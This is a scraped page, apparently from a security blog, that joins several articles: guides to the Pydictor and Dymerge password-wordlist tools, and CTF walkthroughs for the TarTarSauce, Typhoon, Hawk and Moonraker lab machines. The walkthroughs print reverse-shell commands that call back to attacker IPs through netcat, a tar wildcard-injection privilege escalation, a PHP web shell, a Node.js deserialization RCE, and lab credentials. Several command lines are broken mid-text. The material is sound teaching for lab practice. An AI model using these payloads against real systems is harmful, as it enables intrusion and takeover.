We hope you enjoyed this basic walkthrough of the Cupp application. It is a very handy and easy to use tool when it comes to making custom dictionaries. Go ahead and see if it can guess your password.

Stay tuned for more articles on the latest and greatest in hacking!!!

In this article we will explore another dictionary building tool “Pydictor”. These tools are always fun to work with, this is another robust tool perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advance.

Table of Content

§ What is Pydictor

§ Installation

§ Numeric Dictionary

§ Lower Case Alphabet Dictionary

§ Upper Case Alphabet Dictionary

§ Numeral Coupled With Upper Case Alphabet

§ Upper Case Coupled With Lower Case Alphabet

§ Numeral Coupled With Lower Case Alphabet

§ Combining Upper Case, Lower Case and Numeral

§ Adding Static Head

§ Adding Static Tail

§ Encoding

§ Character Permutation

§ Multiple Character Group Permutation

§ Social Engineering Dictionary

§ Customizing the Social Engineering Dictionary

§ Manipulating Dictionary Complexity Filter

§ Using Plugin

§ Leet Function

What is Pydictor

Pydictor is one of those tools that both novices and pro can appreciate. It is a dictionary building tool that is great to have in your arsenal when dealing with password strength tests. The tool offers a plethora of features which can be used to create that perfect dictionary for pretty much any kind of testing situation.

Installation

Let’s get cracking, the first thing we do is download Pydictor from GitHub and run it using Python. The moment the tool is executed, the running commands are visible to see other optional arguments.

git clone https://github.com/LandGrey/pydictor.git

cd pydictor

python pydictor.py

-base [type]

-base Type Choose from (d, L, c, dL, dc, Lc, dLc)

d digital [0 - 9]

L lowercase letters [a - z]

c capital letters [A - Z]

dL Mix d and L [0-9 a-z]

dc Mix d and c [0-9 A-Z]

Lc Mix L and c [a-z A-Z]

dLc Mix d, L and dL [0-9 a-z A-Z]

-char [custom_char]

-chunk [chunk1] [chunk2] ...

-extend [string_or_file]

-plug [pid6,ftp,pid8,birthday,pid4,scratch]

-plug arg [arg ...] birthday [begin_date] [end_date], date format: [YYYYMMDD]

ftp [keyword1] [keyword2] ...

pid4 chinese id card last 4 digit

pid6 chinese id card last 6 digit

pid8 chinese id card last 8 digit

scratch [url_or_file]

--conf [expression_or_file]

-o,--output [directory]

-tool [handler,hybrider,uniqifer,uniqbiner,shredder,comparer,counter,combiner]

--len [minlen] [maxlen]

--head [prefix_string]

--tail [suffix_string]

--encode [none,sha1,sha512,b64,url,md516,des,rsa,b32,b16,test,sha256,execjs,hmac,md5]

--occur [letter] [digital] [special]

--types [letter] [digital] [special]

--regex [regex]

--level [code]

--leet [code]

Numeric Dictionary

We are beginning by exploring the option to create a numeric or as described by the tool, digital, dictionary. Let’s start by keeping it simple, only 5 characters long and limited to 0 – 5. We will be using the “—base” option to accomplish this.

The output is saved by default but in this case we will be saving it to “dict.txt”. The storage location will always appear after each execution. The “cat” command is used to view the output in the terminal.

python pydictor.py --len 5 5 -base d -o dict.txt

Alphabet Dictionary

We will be making a dictionary which only holds lower case alphabets, the length of the words will remain to 5 characters.

python pydictor.py --len 5 5 -base L

Upper Case Alphabet Dictionary

We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.

The result is visible to see.

python pydictor.py --len 5 5 -base c

Numeric Coupled With Upper Case Alphabet

The base options in Pydictor can be used in conjunction with each other, in this instance we will be coupling numeric (d) and upper case alphabets (c). Let’s see what kind of output we get.

python pydictor.py --len 5 5 -base dc

Upper Case Coupled With Lower Case Alphabet

This time it’s going to be both upper and lower case alphabets together.

python pydictor.py --len 5 5 -base Lc

Numeral Coupled With Lower Case Alphabet

Let’s see what we get when we couple numerals with lower case alphabets.

python pydictor.py --len 5 5 -base dL

Combining Upper Case, lower Case and Numeral

Now let’s combine all the 3 options that we’ve been playing. We will now combine upper case, lower case and numeral. To keep the output moving quicker we will limit the word length to 3 characters.

python pydictor.py --len 3 3 -base dLc

Adding Static Head

We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static head in front of all the numerals.

python pydictor.py --len 5 5 --head raj -base d

Adding Static Tail

We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static tail at the end of all the numerals.

python pydictor.py --len 5 5 --tail raj -base d

Encoding

Pydictor has an encode function that we can use to encode the words in the dictionary.

It gives us the option to choose from popular encoding algorithms such as Base64, DES, AES, MD5, SHA256, etc. In this instance we will be using Base64 as our algorithm of choice to encode numerals.

In the interest of thoroughness, we will first generate the numerals without encoding and then with encoding.

python pydictor.py --len 5 5 –base d

Now we see what the Base64 encoded output looks like

python pydictor.py --len 5 5 -base d --encode b64

Character Permutation

We can use a permutation of a single word, Pydictor lets us choose a word and churn out as many permutations of it as possible.

python pydictor.py -char raj

Multiple Character Group Permutation

We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.

This time we will be giving it multiple group of characters which it will take and churn out as many permutations as possible. It begins in a subtle way by just manipulating one word and then gradually moves on to the others. Notice the progression in the screenshot below.

python pydictor.py -chunk abc ABC 666 . _ @ "'

Social Engineering Dictionary

Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a custom tailored dictionary. We run the “help desc” within the social engineering dictionary builder option to see the various defaults it has to offer.

python pydictor.py --sedb

Customizing the Social Engineering Dictionary

“show option” is used within the social engineering dictionary builder to set the various vectors from profiling a target to generate a target specific dictionary. In this instance we will only be inputting the name, birth date, and email and phone number. The vectors are set using the “set” command.

Let’s see what our social engineering dictionary output looks like.

Manipulating Dictionary Complexity Filter

We will be doing two things in this instance, we will be extending a dictionary based on a rule and separating words filtered according to complexity level. The complexity level is set to 3 by default, we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.

We view the latter part of the output.

python pydictor.py -extend raj --level 4 --len 1 6

Using Plugin

Pydictor has plugins built into it by default, we will be suing a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number. We will filter it using the “-occur” function. The occur option lets us defines with the following; letter, numeral and special character, in that order. We will only be looking for results that have numerals occurring 4 times or more in a single string.

python pydictor.py -plug pid6 --types ">=0"">=4"">=0"

Leet Function

The leet function can selectively substitute numerals or special characters in the place of alphabets to illustrate; leet turns to L331. We will be using the leet function in conjunction with the occur option and extend function.

This is a more complex ask that we have made from Pydictor than our earlier instances, let’s see what our output looks like.

python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10"">0""<=2"

We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool is gives the user a lot of advance options which can a bit overwhelming unless the user has a very clear picture of what they want out of this tool.

Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.

Stay tuned for more articles on the latest and greatest in hacking.

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Penetrating Methodology

§ Network scanning (Nmap)

§ Directory Enumeration (Drib)

§ Exploiting Wordpress against RFI Vulnerability

§ Spawning TTY shell

§ Check sudoers list permissions

§ Wildcard injection privilege escalation

§ Modify backup file to get root flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -A 10.10.10.88

From given below image, you can observe we found port 80 is open for http service and found robot.txt with 5 disallowed entries.

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.

dirb http://10.10.10.88

dirb http://10.10.10.88/webservices/

Dirb scan gave us the directory called “/webservices/wp/” that hosts a wordpress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on kali Linux. We copy it to desktop and rename it to wp-load.phpto execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

python -m SimpleHTTPServer 80

We setup our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access “onuma” directory. So we spawn a tty shell using python to check the sudoers list.

python -c “import pty; pty.spawn(‘/bin/bash’)”

We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.

sudo -l

We create an nc reverse shell using msfvenom.

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R

Now we move to the reverse shell and create a bash file using the nc command and save it as “wp.sh”.

Now tar has the ability to execute command using “--checkpoint-action”. So we created a file named “--checkpoint-action=exec=sh wp.sh” and “--checkpoint=1”. So that we can execute our command as user onuma.

mkdir data

cd data

echo “mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0

/tmp/cezbk 2>&1; rm /tmp/cezbk” > wp.sh

echo “” > “--checkpoint-action=exec=sh wp.sh”

echo “” > --checkpoint=1

sudo -u onuma /bin/tar cf archive.tar *

We use setup our listener using netcat, as soon as we run the tar command as user “onuma” we get our reverse shell as user “onuma”. Now we change the directory to /home/onuma and find the file called “user.txt” we take a look at the content of the file and find the 1^stflag. After finding the flag we spawn a tty shell using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.

We use a script that takes the advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here. After running the script we find the root flag.

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.

Flag: root-flag

Since there are multiple ways in which we can exploit this machine. Therefore we have used two methods to capture the flag as follows:

Method 1- Using a LOCAL PRIVILEGE ESCALATION SHELL after logging into SSH.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.

netdiscover

We found our target IP –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).
Further we notice that there is a entry /monoadmin/in robot.txtas it might be useful.

We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine. But will see to it later on.

Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the image. Here we set change database to credentials(84mb).It will display a link of 2 Credentials. Click on it.

Clicking on the 2 Credential link will give us 2 Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.

After a sometime, we just strike with a idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.

Than we simply logged in SSH with CREDENTIALS Username:typhoon & Password: 789456123

ssh typhoon@192.168.1.101

Then we checked system information and found out Ubuntu 14.04 is running on target machine. Good thing we were familiar with an exploitfor Ubuntu 14.04.

Next we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used have highlighted, after that we have copied the exploit 37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.

Afterwards we have downloaded our exploit 37292.cin the /tmp directory. After compilation and granting permissions to the exploit. We have executed it.

Booyeah!!We have got the root access and found our FLAG. We take a look at the content of the file and greeted with a congratulatory message.

Method 2

Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.

Let’s Begin with the Walkthrough!!

Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.

We are very fimiliar with Tomcat Server Login using manager webapp due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using MetasploitsTomcat Manager using the Default credentials for Tomcat Server Login.

[username]:tomcat

[password]:tomcat

Oh Yeah! We have got the meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consist of file script.shthat was owned by root and has FULL Permission. So we thought of inserting a malicious code in script.sh.

Moving on!! We need to create a bash code using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R

After that, append the above generated malicious code in the script.sh file.

echo “mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0

/tmp/vvwjo 2>&1; rm /tmp/vvwjo” > script.sh

Since the malicious code got executed with the script.sh file. Therefore we got a reverse shell on our netcat listener.

Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and greeted with a congratulatory message.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Today we are going to solve another CTF challenge “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt

Note: Since these labs are online available therefore they have static IP. The IP of HawkNew is 10.10.10.102

Penetration Methodology:

§ Port scanning and IP discovery

§ Anonymous FTP Login

§ Checking file type

§ Getting Login Credentials

§ Browsing IP through port 80

§ Exploiting Drupal

§ Reading First Flag User.txt

§ Getting Login Credentials

§ Spawning TTY Shell

§ Searching exploit via Searchsploit

§ Getting root Access

§ Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).

From the NMAP Scan output we saw that ftp Port 21 is Open and the next thing that catches our eyes is it so it has Anonymous login allowed.

ftp 10.10.10.102

We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. “.drupal.txt.enc“andthen we transferred the file to our local machine.

Since .drupa.txt.encis encrypted. Let’s check the file type using ‘file’ command.

file.drupal.txt.enc

It came out to be openssl encoded data with salted password. Clearly we need to decrypt the file to get any further clue.

To crack this file, we have used an openssl bruteforce tool which is easily available on github. You can download it from the given below link or can run the following command for downloading and script execution.

git clonehttps://github.com/deltaclock/go-openssl-bruteforce.git

./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123”this could be the password for CMS Login. Let’s Check it.

As port 80 is running http server, we open the target machine’s IP address in our browser and found out it’s a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.

Oh yeah!! We have successfully logged into admin dashboard. Now go to modules and then enable the check box for Path and PHP filter.

After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.

Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.

&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the Text format as “PHPCode”. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.

nc -lvp 1234

We got a reverse connection of victim’s machine on our netcat listener. To spawn the proper shell we have used python3 bin bash one liner.

python3 -c ‘import pty;pty.spawn(“/bin”bash”)’

Inside /home/denial we have got to User.txtflag, now time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file, in this file we found the password: drupal4hawk

cat settings.php | grep Password

Then with the following command we switch the user and logging in as user daniel.

su daniel

Password: drupal4hawk

Here we have used Simple phyton3 commands to escape the python3 interpreter.

>>import pty

>>pty.spawn(‘/bin/bash’)

From Nmap scan output we notice that “H2 database running on port 8082”, therefore we search out for H2 database exploit in searchsploit.

searchsploit H2 database

It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that we have copied the exploit 45506.py in the /root directoryand run a Python server to download the file in the target machine.

searchsploit -m 45506

python -m SimpleHTTPServer 8080

Afterwards we have downloaded our exploit 45506.py in the /tmp directory of target machine. Then Grant the FULL permission to the exploit and execute it using command.

cd /tmp

wget http://10.10.14.10:8080/45506.py

chmod 777 455506.py

python3 45506.py –H 127.0.0.1:8082

Finally!! We have got the root access. Now let’s go and get the “root.txt”.We take a look at the content of the file and find our final flag.

Hello friends! This article is comprehensive guide on the Dymerge tool. This is a handy little tool that helps you manage all the dictionaries that you’ve created reading through our blog and using all the amazing tools we’ve written about.

Table of Content

§ What is Dymerge

§ Installing and Launching Dymerge

§ Standard Merge

§ Fast Mode

§ Removing Duplicates

§ Reverse Listing

§ Alphabetic and Numeric Sorting

§ Defining Output

§ Including Characters

§ Compressing Output

Introduction to Dymerge

Dymerge is a tool that gives you the ability to manage dictionaries. By manage we mean it lets you gives the ability to reshape and merge them. Reshaping and merging may seem trivial but considering the fact that you could be dealing with millions of words, even the smallest of operation can turn into a mammoth and complicated task.

Installing and Launching Dymerge

We can install Dymerge from GitHub and launch it in two simple commands. We have used the “– h” flag to display the various options Dymerge has to offer.

git clone https://github.com/k4m4/dymerge.git

./dymerge.py

Standard Merge

We hope you have a few dictionaries handy to follow through with what we are doing. This a standard merge where we specify the paths to 2 different dictionaries and Dymerge combines them.

To avoid any confusion, the command is “./dymerge.py” followed by the path of the first dictionary, then a space and the path to the second dictionary. The output by default will be in a file named “dymerged.txt”

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt

Fast Mode

Arguably if the dictionaries are very large, performing any operation on them will take time. The person who made Dymerge thought of this conundrum and gave us a way to speed up the process by using the “-f” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt –f

Removing Duplicates

A lot of the dictionary making software’s follow the same logic, so there are bound to be similar words from time to time. Dymerge gives us the option to remove duplicate words from dictionaries while combining them. To achieve this, we will be using the “-u” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u –f

Reverse Listing

Dymerge gives us the option to reverse the order of the words in the dictionaries that we merge, this mean that the first word in the new dictionary will be last word of the second dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r –f

Alphabetic and Numeric Sorting

This option lets us sort words alphabetically, it also sorts numbers by following the progression of a number line from left to right when merging 2 dictionaries to 1. We will be using the “-s” flag to perform this operation.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s –f

Defining Output

So far we have been letting Dymerge save the output using it’s default settings, this time we will define the file name and destination of the output by using the “-o” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt

Including Characters

Just in case we find that we need something specific added to the dictionary, we can use the “-I” flag. Any characters placed after using the include flag are added to the dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj

And here we see “raj” being added to the dictionary.

Compressing Output

Dictionaries can be pretty big in size, especially when you’re talking about a unified dictionary comprised of multiple dictionaries. Dymerge gives us the option to compress our output using the “-z” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f –z zip

All said and done, this is a pretty neat little tool to use when you’re dealing with multiple dictionaries and need something to bring a little bit of order. The functions it performs may seem simple of the face of it but are without a doubt very useful.

Stay tuned for more articles on the latest and greatest in hacking.

Hack into the Moonraker system and discover who's behind these menacing plans once and for all. Find and destroy the Villain before it's too late. You've received intelligence of a new Villain investing heavily into Space and Laser Technologies. Although the Villain is unknown we know the motives are ominous and apocalyptic. The challenge is to get root on the Targeted Virtual Machine and read the flag.txt within that directory.
Download it from here: https://www.vulnhub.com/entry/moonraker-1,264/

Penetrating Methodology:

Network Scanning (Netdiscover & Nmap)
Web directory enumeration (Dirb)
Tail off apache2 access logs.
Browsing through discovered directories.
Finding Login Credentials for CouchDB’s Login.
Fauxton Login Page Link.
Checking Various Directories over browser.
Finding Login Credentials.
Logging into Node.js express framework.
Capturing Cookie using Burpsuite.
Using Node.js deserialization exploit for RCE.
Converting Decimal value to ASCII text.
Using a script to Convert ASCII text to Decimal value.
Base64 encoding using echo.
Getting reverse shell over netcat listener.
Converting Hash string using John the Ripper tool
Getting root access.

· Reading the flag.

Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our targets IP.
netdiscover

We found our target IP –> 192.168.1.110

Our next motive is to scan the target IP with nmap.

nmap -p- -A 192.168.1.110 --open

The NMAP scan output shows various open ports: 22(ssh), 80(http), 110(pop3), 3000(http), 4369(epmd), 5984(couchdb).

From NMAP Scan output, we saw port 80 is open. Therefore we navigate to port 80 in the web browser. But it was not much of a help to move ahead.

Now we thought of enumerating for accessible directories on the Target Machine with the help of following command.

dirb http://192.168.1.110/

After recursively enumerating, we found a useful directory /services as highlighted.

Let’s just browse the found directory/services in the browser where at bottom of the webpage we saw an SEND AN INQUIRY Hyperlink. Let’s find out where it will lead us by clicking on it.

So it opened a SERVICES INFORMATION REQUEST FORM as shown in the image. We noticed that someone will check our web-based enquiry and will contact us in under 5minutes. This strikes us that some kind a logs will be made. But the question is where?

We have filled the enquiry form using the html code with image tag as shown in the image.

Before Clicking Submit to Sales Rep! We have restarted apache2 service,because if any logs will be made, we can easily see them by accessing apache2 access.log. After clicking Submit, it has displayed thanks for your inquiry message as shown in the image.

We have just tail off the access log of apache2 by using command.
tail -f /var/log/apache2/access.log
The log formed exposed a new webpage as highlighted in the image.

Let’s just find out where the new webpage is going to take us. For that we opened it in the browser.

So it leads us to Sales Admin Interface. This looks interesting and might be holding some great clues.

Next thing we opened CouchDB Notes and got some hints about Login Credentials for Username: jaws and Password: jaws girlfriend name + x99. Here we Google for jaws girlfriends name which came out to be dolly.

We will be requiring these found Credentialsto log into Fauxton which is included in Apache CouchDb. To know more about Fauxton and CouchDB we have searched about them on google and find out a hint on how to open a CouchDB Login Page.

Since port 5984 is open. We are able to open the CouchDB Login Page.
192.168.1.110:5984/_utils/
Here we have used Login Credentials as follows:
Username: jaws
Password: dollyx99

Booyeah!!We have successfully logged in. Now let’s check out the docs inside these 3 databases.

The link database came out to be useful. Looking through the documents inside the link database, since every document contains a directory link but the highlighted one might be give us another clue for our next step.

So the link we have found in the highlighted document is shown in the image. Let’s copy and open this link in the browser.

So the above link opened an OFFER LETTER ARCHIVE BACKUP WEBPAGE. This is interesting, let’s check out what’s hiding in these offer letters.

Woah!! All the offer letters contains a Username and Password. But the one we have used is shown in the image.

From the NMAP Scan output, we knew port 3000holds a Node.js framework. So we browse the Target IP on port 3000 on the browser and encountered a login portal. Credentials use to log in are as follows:
Username: hugo
Password: TempleLasersL2K

After successfully logging in, we are displayed a message shown in the image. This page seems of no use but after spending time figuring out what to do next it became very interesting.

Time to Launch Burp Suite and intercept the request of this page. After intercepting we saw a base64 encoded line in Cookie: profile as you can see in the image. Here we will be inserting node.js deserialization exploit in base64 encoded form. Let’s begin with the process.

From the image you can figure out that we will copy a Node.js deserialization exploit for Remote Code Execution.
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

After copying it, let’s convert the Decimal value into ASCII text using a converter available online. And don’t forget to copy the ASCII text.

Using nano, we have created a file and pasted the ASCII text copied. Here we have given our KaliLinuxIP in host and set portto 1337 just save it.

So we have created a script exploit.pywhich will convert the ASCII text to Decimal value and it will also put COMMA in between every Decimal value converted. Whereas we are using echocommand to convert the Decimal valueinto Base64 encoded string. And copy the whole base64 string.

Setthe Copied base64string into Cookie: profile in the request intercepted in the Brupsuite and before forwarding the request just execute a netcat listener over port 1337.

Therefore we got a reverse shell on our netcat listener. To spawn the shell we have used python bin bash one liner.
python -c 'import pty; pty.spawn("/bin/bash")'
After recursively enumerating we found four mailboxes in /var/mail but the problem is they lack in permissions. After knowing about CouchDb’s Configuration, we come across that CouchDb’s default installation directory is /opt/couchdb and it reads configuration file from this directory etc/local.ini.
Let’s tail off the contents in local.ini.
tail /opt/couchdb/etc/local.ini
After running this command, it displayed another Login Credential as shown in the image.
Username: hugo
Password: 321Blast0ff!!

Then with the following command we switch the user and logging in as user hugo.
su hugo
password:321Blast0ff!!

Reading the mails of hugo, we were brought to notice that Message 2 is interesting as it contains password to root in hash and also tells us to ADD ‘VR00M’ after roots password. Time to crack the password, to do that we have copied the password and pasted inside a file named hash.

Therefore, John the Ripper tool cracked the hash password for root i.e
Username: root
Password: cyber

Let’s again switch user and Login as root.
su root
Password: cyberVR00M

Booyeah!! We have successfully logged in as root and while checking through its mail directory, we have found our flag.txtfile. We take a look at the content of the file and greeted with a congratulatory message.

Matrix: 1 Vulnhub Walkthrough

Comprehensive Guide on Hydra - A Brute Forcing Tool

Comprehensive Guide on Medusa - A Brute Forcing Tool

Web Proxy Penetration Lab Setup Testing using Squid

Socks Proxy Penetration Lab Setup using Microsocks

Comprehensive Guide on Cewl Tool

Hack the Box: Jerry Walkthrough

Comprehensive Guide on Dirbuster Tool

Fowsniff: 1 Vulnhub Walkthrough

Raven 2: Vulnhub Walkthrough

FourAndSix: 2 Vulnhub Walkthrough

Xerxes: 1 Vulnhub Walkthrough

Mercy: Vulnhub Walkthrough

Comprehensive Guide on Cupp– A wordlist Generating Tool

Comprehensive Guide on Pydictor – A wordlist Generating Tool

Hack the Box: TarTarSauce Walkthrough

Typhoon: Vulnhub Walkthrough

Hack the Box: Hawk Walkthrough

Comprehensive Guide on the Dymerge

Moonraker:1 Vulnhub Walkthrough